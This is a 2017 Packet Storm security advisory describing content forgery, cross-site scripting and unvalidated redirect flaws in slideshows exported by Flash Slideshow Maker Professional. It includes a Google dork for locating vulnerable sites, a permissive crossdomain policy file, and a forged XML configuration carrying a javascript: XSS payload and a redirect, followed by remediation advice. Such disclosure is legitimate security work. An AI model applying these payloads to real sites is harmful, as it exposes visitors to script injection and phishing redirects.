Exploit the possiblities

Flash Slideshow Maker Professional XSS / Content Forgery / Redirect

Flash Slideshow Maker Professional XSS / Content Forgery / Redirect
Posted Jul 29, 2017
Authored by ret2eax

Flash Slideshow Maker Professional suffers from content forgery, cross site scripting, and unvalidated redirection vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | c241b411c441ec7e0f4241ebd18bacfe

Flash Slideshow Maker Professional XSS / Content Forgery / Redirect

Change Mirror Download
=================================================================================
_ _____ _____ _____
| | | _ | |____ | |____ |
| |__ | |/' |_ __ ___ / / ___ _ __ / /_ __
| '_ \| /| | '_ ` _ \ \ \/ __| '__| \ \ \ /\ / /
| | | \ |_/ / | | | | |.___/ / (__| | .___/ /\ V V /
|_| |_|\___/|_| |_| |_|\____/ \___|_| \____/ \_/\_/

> _[C O N T A C T] :
Twitter: @ret2eax
Email: ret2eax@riseup.net
Blog: ret2eax.pw
Website: hackthegrid.com.au

[+]-----------------------------------------------------------------[+]
| Impacted Vendor: SocuSoft Co. |
| Vulnerable Software: Flash Slideshow Maker Professional |
| Software URL: http://flash-slideshow-maker.com |
| Effected Release: All Versions |
| Vulnerability Type: Content Forgery, XSS, Unvalidated Redirects |
| Date Released: 29/07/2017 |
| Released by: ret2eax |
[+]-----------------------------------------------------------------[+]

=================================================================================

[+]----------------------------[ S U M M A R Y ]------------------------------[+]

Flash Slideshow Maker is a Flash Shockwave (SWF) movie maker containing static
images which are presented in a slideshow format.

This vulnerability does not exist within the software application itself, instead,
the vulnerability presents itself within the exported files.

It was identified that the Flash Slideshow Maker application has two configuration
themes associated with generating the slideshow content, basic and advanced.

The basic theme will generate a single SWF file containing the content embedded
within. Whereas, the 'advanced' theme is XML driven. Meaning, in the final output,
there will be the SWF itself, image files and an XML document containing the
configuration that controls the SWFs behaviour. This 'advanced' theme
configuration is the cause of why such a vulnerability exists.

Therefore the themes associated with the advanced configuration are vulnerable,
whereas the content associated with the themes outlined in the 'basic'
configuration are not vulnerable.

[+]-------------------------[ D E S C R I P T I O N ]------------------------[+]

This vulnerability exists not because of the SWF but due to the insecurity
associated with it's XML configuration file, and the fact that the xml_path HTTP
parameter trusts user supplied input. An attacker can pull the XML configuration
containing the SWFs behavioural structure. In doing so, the attacker can mimic,
forge and thus alter the pre-defined behaviour of the SWF by assigning malicious
arbitrary values within the associated XML configuration parameters. Exploitation
is achieved by uploading the evil XML to a web server, where it is now possible
to remotely call and include the fraudulent XML through the SWF via GET.

An attacker can perform Content Forgery, Unvalidated Redirects, and
XSS attacks against authenticated and un-authenticated users through the
dissemination of a comrpomised URL.

In order for any of the vulnerabilities (besides Content Forgery of course)
to execute, the victim is required to click on the image within the slides.
The likelihood of this can be enhanced through the XML configurations title
variables, and setting the title to be staticly displayed, however this persuasion
could also be conducted through the Content Forgery where a JPEG or any other
image file can be displayed containing text to persuade the victim to perform the
required user interaction.

[+]-----------------------[ P R E C O N D I T I O N S ]---------------------[+]

In order to exploit this vulnerability, the attacker must have a correctly configured
crossdomain policy running on the same server that they are hosting the malicious XML
file. An example is as seen below:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>


[+]------------------------[ E X P L O I T A T I O N ]----------------------[+]

A Proof of Concept is as follows:

> _[The Basis] :

Vulnerable endpoints can be located through the following Google Dork:
filetype:swf inurl:?xml_path=

~ 64,500 potentially vulnerable endpoints match this criteria.

Obtain the SWFs XML configuration, by replacing the .swf extension value with that
of the called GET .xml value stored in the xml_path HTTP parameter. Once obtained,
edit the XML configuration to control the SWFs behaviour. Finally host it on a
web server where it can then be called through setting the xml_path parameter to
point to the now manipulated XML config; ?xml_path=//domain.com/path/to/evil.xml
again, to execute XSS and evil redirects, click on the image containing the
associated payload.

> _[Example of Manipulated XML Config] :


<?xml version="1.0" encoding="UTF-8" ?>
<flash_parameters copyright="socusoftFSMTheme">
<preferences>
<global>
<basic_property movieWidth="480" movieHeight="400" html_title="Title" loadStyle="Bar" startAutoPlay="true" continuum="true" backgroundColor="0x005080" hideAdobeMenu="false" photoDynamicShow="true" enableURL="true" transitionArray=""/>
<title_property showTitle="true" photoTitleColor="0xff0000" backgroundColor="0xffffff" alpha="50" autoHide="true"/>
<music_property path="" stream="true" loop="true"/>
<photo_property topPadding="0" bottomPadding="40" leftPadding="0" rightPadding="0"/>
<properties enable="true" backgroundColor="0xffffff" backgroundAlpha="30" cssText="a:link{text-decoration: underline;} a:hover{color:#ff0000; text-decoration: none;} a:active{color:#0000ff;text-decoration: none;} .blue {color:#0000ff; font-size:15px; font-style:italic; text-decoration: underline;} .body{color:#ff5500;font-size:20px;}" align="bottom"/>
</global>
<thumbnail>
<basic_property showPrview="true" buttonColor="0xffffff" borderColor="0xffffff" currentBorderColor="0xffffff"/>
</thumbnail>
</preferences>
<album>
<slide jpegURL="foo.jpg" d_URL="foo.jpg" transition="0" panzoom="1" URLTarget="1" phototime="5" url="javascript:alert(document.domain)" title="XSS PoC by @ret2eax" width="480" height="360"/>
<slide jpegURL="bar.jpg" d_URL="bar.jpg" transition="29" panzoom="1" URLTarget="0" phototime="5" url="http://ret2eax.pw" title="Redirect PoC by @ret2eax" width="480" height="360"/>
</album>
</flash_parameters>

[+]------------------------[ R E M E D I A T I O N ]------------------------[+]

Perform proper input sanitization, review crossdomain policy to ensure it's
configured correctly in the sense that it should disallow script access from
remote domains. Alternatively, remove the vulnerable content entirely.

=================================================================================
































































































Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    8 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close